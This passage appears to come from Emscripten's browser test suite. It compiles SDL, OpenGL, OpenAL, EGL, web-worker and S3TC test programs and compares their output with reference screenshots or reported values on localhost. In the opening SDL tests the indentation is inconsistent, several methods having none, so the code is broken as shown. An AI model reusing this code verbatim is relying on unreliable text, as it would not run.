    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix(self):
    # SDL_mixer with a sound effect, music track and extra noise sample.
    shutil.copyfile(path_from_root('tests', 'sounds', 'pluck.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
    shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'music.ogg'))
    shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
    with open(path_from_root('tests', 'sdl_audio_mix.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_audio_mix.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix.c'), '--preload-file', 'sound.ogg', '--preload-file', 'music.ogg', '--preload-file', 'noise.ogg', '-o', 'page.html']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_quickload(self):
    # Playing audio immediately, without any preloaded sound assets.
    with open(path_from_root('tests', 'sdl_audio_quickload.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play"]']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_beeps(self):
    # Generated beep tones through SDL audio.
    with open(path_from_root('tests', 'sdl_audio_beep.cpp')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_audio_beep.cpp'), 'w') as f:
        f.write(self.with_report_result(src))
    # use closure to check for a possible bug with closure minifying away newer Audio() attributes
    Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_beep.cpp'), '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-o', 'page.html']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_canvas_size(self):
    # Canvas sized through a custom shell file; compare against the
    # reference image with one unit of slack.
    build_args = ['-O2', '--minify', '0',
                  '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'),
                  '--preload-file', path_from_root('tests', 'screenshot.png') + '@/',
                  '-s', 'LEGACY_GL_EMULATION=1']
    self.btest('sdl_canvas_size.c', reference='screenshot-gray-purple.png', reference_slack=1,
               args=build_args,
               message='You should see an image with gray at the top.')
def test_sdl_gl_read(self):
    # SDL, OpenGL, readPixels
    with open(path_from_root('tests', 'sdl_gl_read.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
    self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'VERBOSE=1'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
  # --- OpenAL / GLFW / EGL / freealut browser tests ---
  def test_openal_playback(self):
    shutil.copyfile(path_from_root('tests', 'sounds', 'audio.wav'), os.path.join(self.get_dir(), 'audio.wav'))
    open(os.path.join(self.get_dir(), 'openal_playback.cpp'), 'w').write(self.with_report_result(open(path_from_root('tests', 'openal_playback.cpp')).read()))
    Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'openal_playback.cpp'), '--preload-file', 'audio.wav', '-o', 'page.html']).communicate()
    self.run_browser('page.html', '', '/report_result?1')

  def test_openal_buffers(self):
    shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), os.path.join(self.get_dir(), 'the_entertainer.wav'))
    self.btest('openal_buffers.c', '0', args=['--preload-file', 'the_entertainer.wav'],)

  def test_glfw(self):
    open(os.path.join(self.get_dir(), 'glfw.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'glfw.c')).read()))
    Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'glfw.c'), '-o', 'page.html', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
    self.run_browser('page.html', '', '/report_result?1')

  def test_egl(self):
    open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
    Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html']).communicate()
    self.run_browser('page.html', '', '/report_result?1')

  def test_egl_width_height(self):
    open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
    Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')

  def get_freealut_library(self):
    # On Windows a cmake-based build is used when cmake is available;
    # elsewhere the autotools build produces the .bc under examples/.libs.
    if WINDOWS and Building.which('cmake'):
      return self.get_library('freealut', os.path.join('hello_world.bc'), configure=['cmake', '.'], configure_args=['-DBUILD_TESTS=ON'])
    else:
      return self.get_library('freealut', os.path.join('examples', '.libs', 'hello_world.bc'), make_args=['EXEEXT=.bc'])

  def test_freealut(self):
    programs = self.get_freealut_library()
    for program in programs:
      assert os.path.exists(program)
      Popen([PYTHON, EMCC, '-O2', program, '-o', 'page.html']).communicate()
      self.run_browser('page.html', 'You should hear "Hello World!"')
  def test_worker(self):
    # Test running in a web worker
    # The harness page posts the worker's result back through /report_result;
    # the test runs twice, with and without a preloaded data file.
    open('file.dat', 'w').write('data for worker')
    html_file = open('main.html', 'w')
    html_file.write('''
      <html>
      <body>
        Worker Test
        <script>
          var worker = new Worker('worker.js');
          worker.onmessage = function(event) {
            var xhr = new XMLHttpRequest();
            xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
            xhr.send();
            setTimeout(function() { window.close() }, 1000);
          };
        </script>
      </body>
      </html>
    ''')
    html_file.close()

    # no file data
    for file_data in [0, 1]:
      print 'file data', file_data
      output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
      assert len(output[0]) == 0, output[0]
      assert os.path.exists('worker.js'), output
      if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
      self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
  def test_chunked_synchronous_xhr(self):
    # End-to-end test of chunked synchronous XHR inside a web worker: a local
    # chunked-HTTP server (spawned below) serves random data, the worker
    # checksums it, and the page reports the adler32 value back.
    main = 'chunked_sync_xhr.html'
    worker_filename = "download_and_checksum_worker.js"

    html_file = open(main, 'w')
    html_file.write(r"""
      <!doctype html>
      <html>
      <head><meta charset="utf-8"><title>Chunked XHR</title></head>
      <html>
      <body>
        Chunked XHR Web Worker Test
        <script>
          var worker = new Worker(""" + json.dumps(worker_filename) + r""");
          var buffer = [];
          worker.onmessage = function(event) {
            if (event.data.channel === "stdout") {
              var xhr = new XMLHttpRequest();
              xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
              xhr.send();
              setTimeout(function() { window.close() }, 1000);
            } else {
              if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
              if (event.data.line) {
                console.error(event.data.line);
              } else {
                var v = event.data.char;
                if (v == 10) {
                  var line = buffer.splice(0);
                  console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
                } else {
                  buffer.push(v);
                }
              }
            }
          };
        </script>
      </body>
      </html>
    """)
    html_file.close()

    c_source_filename = "checksummer.c"

    prejs_filename = "worker_prejs.js"
    prejs_file = open(prejs_filename, 'w')
    prejs_file.write(r"""
      if (typeof(Module) === "undefined") Module = {};
      Module["arguments"] = ["/bigfile"];
      Module["preInit"] = function() {
        FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
      };
      var doTrace = true;
      Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
      Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
    """)
    prejs_file.close()
    # vs. os.path.join(self.get_dir(), filename)
    # vs. path_from_root('tests', 'hello_world_gles.c')
    Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
           '--pre-js', prejs_filename]).communicate()

    chunkSize = 1024
    data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
    checksum = zlib.adler32(data)

    server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
    server.start()
    self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
    server.terminate()
    # Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
    # attempt to rmdir() files in use.
    if WINDOWS:
      time.sleep(2)
  # --- GLES / glbook browser tests ---
  def test_glgears(self):
    self.btest('hello_world_gles.c', reference='gears.png', reference_slack=1,
        args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
        message='You should see animating gears.')

  def test_glgears_animation(self):
    # Three variants: plain, _full and _full_944, the latter two built with
    # FULL_ES2=1.
    es2_suffix = ['', '_full', '_full_944']
    for full_es2 in [0, 1, 2]:
      print full_es2
      Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
             '-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
             '--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
            (['-s', 'FULL_ES2=1'] if full_es2 else []),
            ).communicate()
      self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')

  def test_fulles2_sdlproc(self):
    self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])

  def test_glgears_deriv(self):
    self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=1,
        args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
        message='You should see animating gears.')
    with open('something.html') as f:
      assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'

  def test_glbook(self):
    # Build and run the OpenGL ES 2.0 Programming Guide sample programs,
    # comparing each against a reference screenshot.
    programs = self.get_library('glbook', [
      os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
      os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
      os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
      os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
      os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
      os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
      os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
    ], configure=None)

    def book_path(*pathelems):
      return path_from_root('tests', 'glbook', *pathelems)

    for program in programs:
      print program
      basename = os.path.basename(program)
      args = []
      if basename == 'CH10_MultiTexture.bc':
        shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
        shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
        args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
      elif basename == 'CH13_ParticleSystem.bc':
        shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
        args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage

      self.btest(program,
          reference=book_path(basename.replace('.bc', '.png')), args=args)

  def test_gles2_emulation(self):
    # Run selected glbook samples built from original sources through the
    # FULL_ES2 emulation path.
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))

    for source, reference in [
      (os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
      #(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
      (os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
      #(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
      (os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
      (os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
      (os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
    ]:
      print source
      self.btest(source,
                 reference=reference,
                 args=['-I' + path_from_root('tests', 'glbook', 'Common'),
                       path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
                       '-s', 'FULL_ES2=1',
                       '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
  # --- emscripten API and misc SDL/GL browser tests ---
  def test_emscripten_api(self):
    self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])

  def test_emscripten_api2(self):
    # Exercises emscripten_async_load_script plus file_packager-generated
    # preload data loaded at runtime.
    open('script1.js', 'w').write('''
      Module._set(456);
    ''')
    open('file1.txt', 'w').write('first');
    open('file2.txt', 'w').write('second');
    Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])

  def test_emscripten_api_infloop(self):
    self.btest('emscripten_api_browser_infloop.cpp', '7')

  def test_emscripten_fs_api(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
    self.btest('emscripten_fs_api_browser.cpp', '1')

  def test_sdl_quit(self):
    self.btest('sdl_quit.c', '1')

  def test_sdl_resize(self):
    self.btest('sdl_resize.c', '1')

  def test_gc(self):
    self.btest('browser_gc.cpp', '1')

  def test_glshaderinfo(self):
    self.btest('glshaderinfo.cpp', '1')

  def test_glgetattachedshaders(self):
    self.btest('glgetattachedshaders.c', '1')

  def test_sdlglshader(self):
    self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_gl_ps(self):
    # pointers and a shader
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

  def test_gl_ps_packed(self):
    # packed data that needs to be strided
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

  def test_gl_ps_strides(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_gl_renderers(self):
    self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_gl_stride(self):
    self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_gl_vertex_buffer_pre(self):
    self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_gl_vertex_buffer(self):
    self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

  # Does not pass due to https://bugzilla.mozilla.org/show_bug.cgi?id=924264 so disabled for now.
  # def test_gles2_uniform_arrays(self):
  #   self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])

  def test_gles2_conformance(self):
    self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])

  def test_matrix_identity(self):
    self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840'], args=['-s', 'LEGACY_GL_EMULATION=1'])
  # --- cubegeom family: immediate-mode / client-side-array GL paths under
  # LEGACY_GL_EMULATION, each compared against a reference screenshot ---
  def test_cubegeom_pre(self):
    self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_pre2(self):
    self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build

  def test_cubegeom_pre3(self):
    self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom(self):
    self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_glew(self):
    self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_color(self):
    self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal(self):
    self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
    self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
    self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
    self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
    self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
    self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_mt(self):
    self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture

  def test_cubegeom_color2(self):
    self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_texturematrix(self):
    self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_fog(self):
    self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_pre_vao(self):
    self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_pre2_vao(self):
    self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cubegeom_pre2_vao2(self):
    self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_cube_explosion(self):
    self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  # --- SDL canvas / surface tests ---
  def test_sdl_canvas_blank(self):
    self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')

  def test_sdl_canvas_palette(self):
    self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')

  def test_sdl_canvas_twice(self):
    self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')

  def test_sdl_maprgba(self):
    self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)

  def test_sdl_rotozoom(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'])

  def test_sdl_gfx_primitives(self):
    self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
  def test_sdl_canvas_palette_2(self):
    # Runs the same program three times with different command-line arguments
    # (-r/-g/-b), injected through separate --pre-js files; copyOnLock is
    # disabled via pre.js for all runs.
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
      Module['preRun'].push(function() {
        SDL.defaults.copyOnLock = false;
      });
    ''')

    open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
      Module['arguments'] = ['-r'];
    ''')

    open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
      Module['arguments'] = ['-g'];
    ''')

    open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
      Module['arguments'] = ['-b'];
    ''')

    self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
    self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
    self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])

  def test_sdl_alloctext(self):
    self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])

  def test_sdl_surface_refcount(self):
    self.btest('sdl_surface_refcount.c', expected='1')

  def test_glbegin_points(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_s3tc(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
    self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])
  def test_s3tc_crunch(self):
    # Packages three .dds textures with --crunch compression, then renames the
    # originals so the program can only succeed by reading the packaged data.
    shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
    shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
    assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
    shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
    shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
    shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
    self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
    shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
    shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
    Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--pre-run', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
    shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
    shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
    shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
    self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_aniso(self):
    if SPIDERMONKEY_ENGINE in JS_ENGINES:
      # asm.js-ification check
      Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
